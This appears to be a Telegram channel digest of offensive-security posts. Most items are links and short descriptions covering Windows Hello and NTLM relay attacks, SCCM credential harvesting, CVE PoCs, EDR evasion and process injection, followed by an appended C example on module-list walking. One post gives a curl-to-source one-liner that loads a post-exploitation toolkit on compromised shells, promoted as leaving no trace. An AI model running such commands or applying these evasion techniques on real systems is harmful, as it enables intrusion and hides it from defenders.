Offensive Xwitter – Telegram
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ Dirk-jan @_dirkjan ]

At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.

Slides:
🔗 https://dirkjanm.io/talks/

PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion

🐥 [ tweet ]
🔥3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

RELEASE:
This should be the 1st command you execute on a remote shell 🧨

source <(curl -SsfL https://thc.org/hs)


Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).

LEAVES NO TRACE (memory only).

🔗 https://github.com/hackerschoice/hackshell

🐥 [ tweet ]
👍15🔥4
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. 🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]

Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.

🐥 [ tweet ][ quote ]
👍13
😈 [ Dazzy @dazzyddos ]

Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.

🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49

🐥 [ tweet ]
😢4🔥2
😈 [ Logan Goins @shellph1sh ]

Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)

🔗 https://logan-goins.com/2024-07-23-ldap-relay/

🐥 [ tweet ]
🔥6🥱4👍1
😈 [ wei @XiaoWei___ ]

MSRC fixed an RCE bug in the TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.

🐥 [ tweet ]
🤯12🔥3👍2
😈 [ Synacktiv @Synacktiv ]

In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.

🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial

🐥 [ tweet ]
🥱6👍4
😈 [ 𝙁 𝙀 𝙇 𝙄 𝙓 𝙈 @felixm_pw ]

How many of you are down the bottom? 💀

🐥 [ tweet ]
👍8😁2🤔2😢2
😈 [ Tetsuo @7etsuo ]

Added templates for 24 process injection techniques to my Windows API Cheatsheet.

Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning

🔗 https://github.com/7etsuo/windows-api-function-cheatsheets

🐥 [ tweet ]
👍10🔥4🥱3🍌2😢1
😈 [ Emeric Nasi @EmericNasi ]

Hi, I talked about advanced initial access in June at OffensiveX in Athens.

Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf

For those who ask: I still don't know when the recorded talk will be published.

🐥 [ tweet ]
👍9🥱2
😈 [ Will @BushidoToken ]

I am happy to share a new resource I recently created called The Ransomware Tool Matrix:

🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix

🐥 [ tweet ]
🔥11👍1
😈 [ Robel Campbell @RobelCampbell ]

Regarding CVE-2024-38063 IPV6 RCE in Windows...

After reading RFCs about optional headers in IPv6 packets, I managed to create a POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually writes data out of bounds and causes a crash.

I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.

As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).

🐥 [ tweet ]
👍9🍌1
😈 [ farmpoet @f4rmpoet ]

It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵

🔗 https://threadreaderapp.com/thread/1825472703223992323.html

🐥 [ tweet ]
Forwarded from nu11z
Hi everyone. Since we've had to pentest FreeIPA a lot lately, we've started developing an impacket-style library tailored to IPA's specifics. So far we've started implementing Kerberos and have written a PoC for CVE-2024-3183. If anyone would like to help with development, you're welcome.

https://github.com/c2micro/ipapocket
🔥13😁1🍌1
😈 [ nc @thoughtfault ]

In a 2021 study, Jensen et al. observed a pronounced concentration of anime girl profile pictures among the most obscure accounts during a social network analysis of "infosec twitter" and associated subcommunities. As part of the study, a visualization was generated:

🐥 [ tweet ]

Good enough.
😁19👍1🤯1
Forwarded from APT
🔐 FreeIPA Roasting (CVE-2024-3183)

A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.

🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC

#freeipa #kerberos #hashcat #cve

———
Adding Misha's talk to the Offzone wishlist 🚶‍♂️
🔥17
😈 [ Kleiton Kurti @kleiton0x7e ]

A year ago I published a blog post on bypassing EDR using CS profiles. I’ve updated it to include an additional way of preventing msvcrt.dll from being flagged by Defender: by making the payload CRT library-independent.

🔗 https://kleiton0x00.github.io/posts/Harnessing-the-Power-of-Cobalt-Strike-Profiles-for-EDR-Evasion/

🐥 [ tweet ]
👍12
#для_самых_маленьких

In interviews I like to ask questions that test understanding of someone else's code, and one of the amusing examples where many people get confused when trying to quickly explain the resulting dissonance is, in my view, the reimplementation of kernel32!GetModuleHandle that has spread through copy-pasting, taken, for example, from here.

At first glance there is nothing unusual about it, except for one nuance: the lookup of the module name through the doubly linked list in this function only works with a non-standard definition of the LDR_DATA_TABLE_ENTRY structure.

If you look at the documentation, the first field of LDR_DATA_TABLE_ENTRY is listed as something called PVOID Reserved1[2], which is nothing other than the doubly linked list LIST_ENTRY InLoadOrderLinks (see image).

For this GetModuleHandle implementation to work, the definition of LDR_DATA_TABLE_ENTRY has to be the one here, namely it must begin with the second field (per the documentation), LIST_ENTRY InMemoryOrderLinks.

Why is that? 🤨

Those who want to can answer this question themselves and rewrite the findNtDll function using the canonical definition of LDR_DATA_TABLE_ENTRY, or open the comments and look at one of the possible solutions 👇🏻
🤔6👍2🔥2
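An added example, not from the post above or the code it links: a plain-C re-creation of the two LDR_DATA_TABLE_ENTRY layouts (reduced to the fields that matter, with BaseDllName narrowed to a C string and constructed DllBase values) that shows why the bare cast only lines up with the shifted definition, and how the canonical definition is walked correctly with CONTAINING_RECORD. The Windows types are re-declared here so it compiles and runs on any platform.

```c
#include <stddef.h>
#include <string.h>
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
/* Canonical layout: the documented PVOID Reserved1[2] is InLoadOrderLinks, and the list that
 * PEB->Ldr->InMemoryOrderModuleList runs through is the SECOND field. BaseDllName is a
 * UNICODE_STRING on Windows, narrowed to a C string here so the demo runs anywhere. */
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    void *DllBase;
    const char *BaseDllName;
} LDR_DATA_TABLE_ENTRY;
/* The copy-paste layout: the same fields, but starting at InMemoryOrderLinks. */
typedef struct _LDR_DATA_TABLE_ENTRY_SHIFTED {
    LIST_ENTRY InMemoryOrderLinks;
    void *DllBase;
    const char *BaseDllName;
} LDR_DATA_TABLE_ENTRY_SHIFTED;
#define CONTAINING_RECORD(addr, type, field) ((type *)((char *)(addr) - offsetof(type, field)))
static LDR_DATA_TABLE_ENTRY g_modules[2] = {  /* constructed stand-in; DllBase values are fake */
    { {0, 0}, {0, 0}, (void *)0x1000, "demo.exe" },
    { {0, 0}, {0, 0}, (void *)0x2000, "ntdll.dll" },
};
static LIST_ENTRY g_head;  /* plays the role of InMemoryOrderModuleList */
static void build_list(void) {  /* thread the entries through InMemoryOrderLinks only */
    LIST_ENTRY *prev = &g_head;
    for (size_t i = 0; i < 2; i++) {
        prev->Flink = &g_modules[i].InMemoryOrderLinks;
        g_modules[i].InMemoryOrderLinks.Blink = prev;
        prev = &g_modules[i].InMemoryOrderLinks;
    }
    prev->Flink = &g_head;
    g_head.Blink = prev;
}
/* Correct with the canonical definition: step back from the link to the record start. */
static void *find_module_canonical(const char *name) {
    for (LIST_ENTRY *p = g_head.Flink; p != &g_head; p = p->Flink) {
        LDR_DATA_TABLE_ENTRY *e = CONTAINING_RECORD(p, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (strcmp(e->BaseDllName, name) == 0) return e->DllBase;
    }
    return NULL;
}
/* The copy-paste walk: a bare cast, which only lines up because the struct was shifted. */
static void *find_module_shifted(const char *name) {
    for (LIST_ENTRY *p = g_head.Flink; p != &g_head; p = p->Flink) {
        LDR_DATA_TABLE_ENTRY_SHIFTED *e = (LDR_DATA_TABLE_ENTRY_SHIFTED *)p;
        if (strcmp(e->BaseDllName, name) == 0) return e->DllBase;
    }
    return NULL;
}
```

Both walks return the same DllBase; with the canonical struct the bare cast would instead land sizeof(LIST_ENTRY) bytes too far into each record, which is exactly what the copy-paste code avoids by dropping the first field.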
😈 [ Josh @passthehashbrwn ]

New blog from me on manually manipulating Vectored Exception Handlers to evade some EDRs and perform threadless process injection.

Blog:
🔗 https://securityintelligence.com/x-force/using-veh-for-defense-evasion-process-injection/

Accompanying code:
🔗 https://github.com/xforcered/VectoredExceptionHandling

🐥 [ tweet ]
👍7🔥2